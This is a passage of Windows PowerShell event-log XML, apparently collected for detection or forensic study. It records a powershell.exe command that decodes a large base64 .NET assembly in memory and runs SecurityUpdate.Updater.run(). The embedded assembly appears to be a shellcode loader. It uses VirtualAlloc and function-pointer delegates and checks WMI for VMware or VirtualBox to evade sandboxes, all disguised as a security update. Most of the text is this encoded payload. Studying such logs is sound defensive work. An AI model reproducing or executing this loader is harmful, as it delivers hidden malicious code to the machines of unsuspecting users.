RPYmplY3RFbnVtZXJhdG9yAEdldEVudW1lcmF0b3IALmN0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBDb250YWlucwBTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMAbHBBZGRyZXNzAE1hbmFnZW1lbnRCYXNlT2JqZWN0AG9iamVjdABmbFByb3RlY3QAR2V0AElBc3luY1Jlc3VsdAByZXN1bHQAVG9VcHBlckludmFyaWFudABTeXN0ZW0uTWFuYWdlbWVudABnZXRfQ3VycmVudABDb252ZXJ0AE1vdmVOZXh0AENvcHkAb3BfRXF1YWxpdHkAU3lzdGVtLlNlY3VyaXR5AAAAkXk2AHcARABvAFkAdwBZAEEAQQBPAHMAQQBZAEQASQBYAEcAcwBmAEIAUgBnAGIAWgBHADgARQAvAGsAdwBBAEEAVQBBAEIARgBNAEIAUQBPAFIAUQBJAFUARAB1AEwAMgBKADgAdwBxADgAOQBNAHoARwBSADgAZgBuADgAdwA3AGUARgB2AFoAeAArAHkASgBjAEEAYQBDAEsAZgAwAGwAcABXAFYAQgBVADEATgBUADAAdAByAE0AeABZAEIANgBiAEcARgA3AFkAZABmAGsATgBCAEQAaAAxAHcAdQBlAEIATAB2AEYASQBmADYAUQBxAG0AegB1AEIASABxAFEAbwByAGgASABaADMAdABQAE8AaQBQAFMAYwBpAEYAcwA4AFUAWQBPAGwALwA2ADIASgBtAEsAbABIAHcAOAA1AGUATQBsAG8ATgBRAFUAUgAzAC8AWgBSADgAeABQAFoANQBnACsASwB3ADcANgBhAEYAZQBNADcAdQBKAG4AdABaAGQAawBjAHkAdQBYAEwANAAvADgAaQBrAEkARgBYAGcAcAAxAFUAYgBnAEYAMQBIAHkAaQAwAEYAUQBoAHIAVABLAFMAOQBIAGwAaABQAEYAZgBJADMASABWADMATQBtAEEAdQA3AEIAbgBuADUAdQAzAG0AcgB6AE8ARgBPAEYANQBYAGUAWQArAGwAQwBOAEkAaABLAFcAeAB4AHcATgBZAEIAaABWAHAAMgBVAFcAdABHAFQAeQAzADYAUAA3ADEARgBLAGMAVwBNAGYAaABCAGUAWAAwAHgANgBOAG4AdwB2AEYAdABqADYAQwArAFAAdgBsAEEAUgBEAFMAZgBjAGsAWQBTAFIATABNAFoAbQBsAGgAdwB4AFMAYgAwAFYAcwB6AGEAdABMAEMASgA5AHIAZwBWAGwAUgBYAGcAeABXAEsAMABBAGIAaQB0AG8AMABRAFUATwAyAFUAOQA2AHYAcABBAG4AMwBYAEsAVQAxAC8AagBtAGQAdQBFAHkAawBxADQAcwBtAEUANABQAEsASwBtAGIAdgBhAGIASwA5AEwAeQB6AFAAcgBQADMAOQBYAGIAegB1AGYAVQBpAEQAQwBlADkAYgBEAHYAOQBvAFkATgBkAEUATwB4AFgAcAA0AGwASABxAHQAagByAFoAdQBQAHMANgBQAGEAbQBBAGEAUAB5ADIAVgB0AFAAQgBMAHAAVwBYAGwAUgBPADMAOABoAHgAcwByAG4AWAB0AEgAbgAyAGEAbgBsAGYASgBCAFkAbABwAEMAbgBDAFIASgBQAHcAMgB2AE8AVABOAGgANABKAEYAeAA2AGUATQBWAGgAZABYAEQAegBtAEQAQwBlAFQAUABOAE4ASQA0ADQATQBsAC8ASwBQAEsAZAAwAFoAawBaAHYAbgB3AFAANAA3ADkANgAxAHYAUwBpAFoAaAA4AFYAaQBHAEUAbwBwAC8ASQByAHoAQgBWAEoAbwBhAGwAYgBLAFgAKwBZAEgATwBJADcAdgBNAG4ASwBHAFMAVAA0AFUAdABsAHYANgBhAEIAMABuAE4AOAA0AGQASgBWAFEAdgB1AC8AQwBHAEsASgBNAFAAVABxAEIAaQBPAEQAcwBlAGoAQQBiADQAOAByADAAbwBBAFQAcwBsAHMAagBrAFoAMQAxAFkAdAAyAC8AYgByAGIAMgBnAGEAbgB0ADkAVwBkAGMAawBVAHAATABpAFAANwBCAEUAQQBtAGMAMwBUAFYAMwBiAFAAQgB4ADUASgBNAHMASwA4AGQANgB2AFQATABqAEkAZgBNAGMATAA5AC8AWgB4AHIAaAAvACsAcgBLAEUAVAB4AE4AYgBqAGYAdQBxAFQAeQA5AHoALwAxAGEALwBWAEgAMgBJAEkAQgBWAFEAZgBTAGgAVABKAG4AMgBxAHEASAA3AHoAMgBhAFcAbwB1AGYAbgBHAFEAUABQAEkATgA4AHAATAA1AEEAYgBHADkASQBVAG8AWgBVADUAKwBLAEIAbABSAE8AaQBCAEYAVgB1AEEAcwB2AGwAMAA0AGcAUQBzADkAUgBlAEUAVQBHAHQANgBYAFoAdAB2AFAANABtAEEAZQAwAHQAbwAzAEYAeAAwAHUATgBEAEcAbABkAGwAegBNAFkAWABsAG4AVwBpADYAYgBTAEUAQQBuAGoAKwBaADIAegAwADcAZQBHADgANwBUAHMATgAzAGQAYgBRADMAeQAwAG4ATwB1ADUAdgB5AC8AeQBSAGUAWQBuAHIARgBpAE4ASwA2AGQAbAAzADEAVwB1AGMAKwAvAFUAQwBLAE4AcwBlAHEATwAwADEARwBJACsATgBQADUAbgB6AFkAbABWAC8AOAB6AHYANgBOAC8AcABuAG0AYwBOADIAOABBAGIAcAB1ADIASQBwAEoAZQA2ADYAagBXAFkASwBCAHUANQBlAFIAWABiAEcAawBlAE0AYwBUAFIAbgBuAGgAMwBXAEcARQAwAHAAUgB6AHoAbQBEAEsAMgBrADgAeQBiADYAMABwAFMAVwArAFYAVQArAFIARwA1ADUAOAA0AHgAaABPAFcAZQBxAFkANABsAFMAcwA1AGIAYgBYAEwAdgB4AGwAQgBxAEsAZAB6ADUAVgBMAEUAZABIAHUAdAAwAFMAaQBVAHQAagBFAEcASABBAEgAbwBOADgAMgBZADEAWABQAHcANQAvAFkARQBtADgASAB2AFQAZgBWAEMAcQBFAEoAUQBnADEAZAA2AFgAbwBBAEgAOAB6AGUAbQB3AEgANgBOAHcAMQBwAC8AVABrADYASAAwAC8ARABLAFEAcQA1AGEAQwBsADMASgBXADkAZgBGAGkALwBPAGEAcAA2AHQANgAzAEQAUABTADAAeQBhAHcAQwBMAGoAcwBKAFAAZwA5AHAAYgBrADAAdABJAHYAUwBkAHcASgBLAHcAVABSADEAcwBuAGUAcgBKAHcAMwBRAFYAMQAxAEkAegBWAEMAbABWAGUATQBCAGsAeAByADkAZQBqAHYAbgBmAHEATAAyAEgAUAAwADUAZwBwAGkAMQBnAHkASAB6AHQAdAA1AGoALwBmAHAAMABlAG8ANQA3AFAATwA3ADkASAB5AGwATwBqAFMATgBMAHoAMQA2AGoAcwA3AG0ANABPAEwAVAAwAG4AcwBRAHYAYwBzAGgARABLAGoAdgBPAHEAUwBnAFgAWABlAHEAWgBwAFQAMwBiAGYAYgBoAFoAYgBMACsAQgBEAHEAWQBkAE4AWABrAEwAZwBNAGoAQwBBAHYATwB2AGgAcgBlAHoAcQB2AEoATwBsAGoAdgBMAGwALwBhAEcAdQBDAFkAZQB5AEIAbABmAFEAdQBkADQAbgBrADgAawBNAFEAUABKAFYAeABlAHMAZwBxAHQANQBKAGkAZgBDAFQAUgBOAHIARQBzADUAYgBvAE8AMwBxAHIAWgBCAGYAbwBSAG0ARgBFAGIAdQBOAGIAYwBLAE4AYQBKAEcANwBCAGwAUgBzAEoAQwA2AG4AdwBZAGQAbQBrAFIAVgBHAGUAZAAvAHAAVwBqAEcAVABRAHcAUABVAEEARQBSAHoAYgBTAG8ASQBWAE4ATAAzAGcAcgBOAGMAVwAxADcAUwBPAGYAbABlAHMAeQArAGkAeAB0AHgANwBIAEkAYgBOAHQAcwBNAGIAaABpAGcANgBwAGEAdABSAGsAMwA1ADMATQBhADAAdQBkADgARABsAHIAaQBNAE4AWQBNAFUARwArAHkAcABWAEUATQB4AG4AOQBYAHoAYwAzAEQASwBoAHMARgBLAE8AMgA3AEoAbgB3AGcAOABVAHQAaABRADIAWgAzACsAYQBOAEYAeQBrAEwAeABFAFIASABtAE4AYQBSAFoAcABSAEoAKwBSAFgAMQBNAFcAdgA3AGkAbAA1AFcAdABqADIASQBhAHQARgA2AGwASQBzAEIAdQBtADkATgBOADUAOQBmAFQANgBPAFYAbQBMAGcAbQBDAGUAbwBXAHUASQBJAEIAagBUAHIAVAB4AFYALwAvAEkAMwB2AG4AVgAwAHcAdgBnAFcAMQB2AEkAVwAzAGQAagBRAFQAdwBXAG4AYgBZADUAagBWAHAAOQBkAEkAWQB2AHoAYgBUAEkAdgBrAFQANgBQAGkAZABkADYATQBwAGMAcQBzAEYAaAAwAFAAeABnAFgASQBOAEMAZwBkAHAASQBZADYATABmAG0AdABPAEcAVQBRAHIAUgA0AFkAawBjAEMAZwBXAHkAMAB6AHYAQwB1AEIAKwB2AFcAZAB5AGMAegBNAGsAcABaAHgAKwBlAFkAcwBQAG8AbgBYAHgAcQBQAHUAWgBNAEYANABXAGMASQA5AEgARQA4ADQAZwBWAGMAQgBzAE8ANQBJAGUAaABsAE0ASAB5ADEAdgBlAEkAWABvAGUAUwBHADYAWABRAGcAbgB5ADEANQBLAHYARABMAFkAZgB1AFMAZABFAHMAMQBZADcARQB6AC8AagBuAGEAZQBVAFoAQwBHAHMATQByAGYAQQArAHQANABCAHkAZABBAFMAVgBVAG8ASwBIAHcASgBPAHcAcABjADUAeABJAFoAbQBrAHYAbwBmAEYAegArAGYAQwBYAFIAMgA0AHIAZgBEAGQAUgBoAGYATgBJAG0AZgBqAFQANQAwAGgARwBJAHIAcwBIAGoAegB4ADYAdgBnAE8AMwBoAGUAWQBjAG0ASABQAGYAdwBIAFYAZABYAG0ARgA4AEMAZABxAHEAcQBBAGwATgAvADQAKwAvAHUAcABkAE8AOAA0AHQARQB3ADEARQBpAGIAdgBhAEoAQgAvAGwAdgBGAGMANABiAFIAaQBoAFcAcwAyAFoASABJAHMAVwB0ADQAYgB1AEsAYwBFAGwANgB2AGsAMgBhAG4AZwBvADUAOABmAEgAYQBtAFAAVQBPAEkAWAByAEEAbwBmAEUANwAyADQAZQBoAHkAaABWAEIASQBzAEIASQBRADkASQBKAE8ASgA1AFEAMAB2AHcATABJAFgAMABNADQAVgBMAGYAUABxAGgAdABLAEkAQgBSAFUAbQBKAFoAYQBaAEQAbwBiAEkAOQBuADEATwAzAGYAQwBnAGcAQgA3AGkAcgBDAEcAWABOAGcAZgB2AHEASABOAHMARgBJAFEANgB6AGsARwBzAGUAcQArAFIARAAyAHoAVABlACsAaQBuAFIAZQBCAG8ANwBWAGoAdwB0AEMAWQBIAGkAWABUAEgAUQBKAFgAbQBMADkAKwBuAE8AWQBBAEgARwBOAGoAagBwAEYAVABrADYANQByAHIALwBHAEkAWgBEADQAagAyAHcANQBsAGUATABlADEAMABSAFoAbwBqAGEAYgB3AGcASwBaAG0AdAA4AFYARQBFAGYANgAwAEkAdwBGAGgAMgBOADgASABZACsAagB5AFkAWQBaAFIANQBvAGwAZwB6AG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")
$asm = [Reflection.Assembly]::Load($bytes)
$method = $asm.GetType("SecurityUpdate.Updater")
$method::run()
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</string>
</Data>
<Binary></Binary>
</EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="PowerShell"></Provider>
<EventID Qualifiers="0">600</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>6</Task>
<Opcode>0</Opcode>
<Keywords>0x0080000000000000</Keywords>
<TimeCreated SystemTime="2023-03-15 19:13:58.732605"></TimeCreated>
<EventRecordID>559</EventRecordID>
<Correlation ActivityID="" RelatedActivityID=""></Correlation>
<Execution ProcessID="0" ThreadID="0"></Execution>
<Channel>Windows PowerShell</Channel>
<Computer>Galax-35</Computer>
<Security UserID=""></Security>
</System>
<EventData><Data><string>Variable</string>
<string>Started</string>
<string> ProviderName=Variable
NewProviderState=Started
SequenceNumber=11
HostName=ConsoleHost
HostVersion=5.1.19041.1237
HostId=82c56100-b912-47b4-a95a-1e8977d022fe
HostApplication=powershell.exe -Command
$bytes = [System.Convert]::FromBase64String("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iQCvAxoAkQCvAwYA2QB/AiwA4QA6AzIA6QDKBDUA8QBsAD4A6QBgA0UAoQCvAxAAoQByBFwAqQChA2EAsQCtBGYAuQDlAmsAmQCQAnAACQF+A3AACQHPBHQACQGKBHAACQEdBHoAsQDBBH8AEQGaAAYAmQCvAwYAJwCDAEICLgALAGABLgATAGkBLgAbAIgBLgAjAJEBLgArAJ8BLgAzAJ8BLgA7AJ8BLgBDAJEBLgBLAKUBLgBTAJ8BLgBbAJ8BLgBjAL0BLgBrAOcBLgBzAPQBCAAGAJUAIAAkAE4AwgJBAQMAGAABAEEBBQAsAAEABIAAAAEAAAAAAAAAAAAAAAAA3AIAAAQAAAAAAAAAAAAAAIMACgAAAAAABAAAAAAAAAAAAAAAjACbBAAAAAADAAIAAAAAPE1vZHVsZT4AbXNjb3JsaWIAZnVuYwBWaXJ0dWFsQWxsb2MAbWV0aG9kAFZpcnR1YWxGcmVlAEVuZEludm9rZQBCZWdpbkludm9rZQBJRGlzcG9zYWJsZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBkd0ZyZWVUeXBlAGZsQWxsb2NhdGlvblR5cGUARGlzcG9zZQBTZWN1cml0eVVwZGF0ZQBNdWx0aWNhc3REZWxlZ2F0ZQBHdWlkQXR0cmlidXRlAFVudmVyaWZpYWJsZUNvZGVBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAU2VjdXJpdHlQZXJtaXNzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkd1NpemUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAFRvU3RyaW5nAEFzeW5jQ2FsbGJhY2sAY2FsbGJhY2sATWFyc2hhbABpc1ZpcnR1YWwAa2VybmVsMzIuZGxsAHRlc3RfZGxsLmRsbAB0ZXN0X2RsbABnZXRfSXRlbQBTeXN0ZW0AYm9vbQBTZWN1cml0eUFjdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBNYW5hZ2VtZW50T2JqZWN0Q29sbGVjdGlvbgBSdW4AWmVybwBNYW5hZ2VtZW50T2JqZWN0U2VhcmNoZXIAVXBkYXRlcgBHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcgBUb0xvd2VyAE1hbmFnZW1lbnRPYmplY3RFbnVtZXJhdG9yAEdldEVudW1lcmF0b3IALmN0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBDb250YWlucwBTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMAbHBBZGRyZXNzAE1hbmFnZW1lbnRCYXNlT2JqZWN0AG9iamVjdABmbFByb3RlY3QAR2V0AElBc3luY1Jlc3VsdAByZXN1bHQAVG9VcHBlckludmFyaWFudABTeXN0ZW0uTWFuYWdlbWVudABnZXRfQ3VycmVudABDb252ZXJ0AE1vdmVOZXh0AENvcHkAb3BfRXF1YWxpdHkAU3lzdGVtLlNlY3VyaXR5AAAAkXk2AHcARABvAFkAdwBZAEEAQQBPAHMAQQBZAEQASQBYAEcAcwBmAEIAUgBnAGIAWgBHADgARQAvAGsAdwBBAEEAVQBBAEIARgBNAEIAUQBPAFIAUQBJAFUARAB1AEwAMgBKADgAdwBxADgAOQBNAHoARwBSADgAZgBuADgAdwA3AGUARgB2AFoAeAArAHkASgBjAEEAYQBDAEsAZgAwAGwAcABXAFYAQgBVADEATgBUADAAdAByAE0AeABZAEIANgBiAEcARgA3AFkAZABmAGsATgBCAEQAaAAxAHcAdQBlAEIATAB2AEYASQBmADYAUQBxAG0AegB1AEIASABxAFEAbwByAGgASABaADMAdABQAE8AaQBQAFMAYwBpAEYAcwA4AFUAWQBPAGwALwA2ADIASgBtAEsAbABIAHcAOAA1AGUATQBsAG8ATgBRAFUAUgAzAC8AWgBSADgAeABQAFoANQBnACsASwB3ADcANgBhAEYAZQBNADcAdQBKAG4AdABaAGQAawBjAHkAdQBYAEwANAAvADgAaQBrAEkARgBYAGcAcAAxAFUAYgBnAEYAMQBIAHkAaQAwAEYAUQBoAHIAVABLAFMAOQBIAGwAaABQAEYAZgBJADMASABWADMATQBtAEEAdQA3AEIAbgBuADUAdQAzAG0AcgB6AE8ARgBPAEYANQBYAGUAWQArAGwAQwBOAEkAaABLAFcAeAB4AHcATgBZAEIAaABWAHAAMgBVAFcAdABHAFQAeQAzADYAUAA3ADEARgBLAGMAVwBNAGYAaABCAGUAWAAwAHgANgBOAG4AdwB2AEYAdABqADYAQwArAFAAdgBsAEEAUgBEAFMAZgBjAGsAWQBTAFIATABNAFoAbQBsAGgAdwB4AFMAYgAwAFYAcwB6AGEAdABMAEMASgA5AHIAZwBWAGwAUgBYAGcAeABXAEsAMABBAGIAaQB0AG8AMABRAFUATwAyAFUAOQA2AHYAcABBAG4AMwBYAEsAVQAxAC8AagBtAGQAdQBFAHkAawBxADQAcwBtAEUANABQAEsASwBtAGIAdgBhAGIASwA5AEwAeQB6AFAAcgBQADMAOQBYAGIAegB1AGYAVQBpAEQAQwBlADk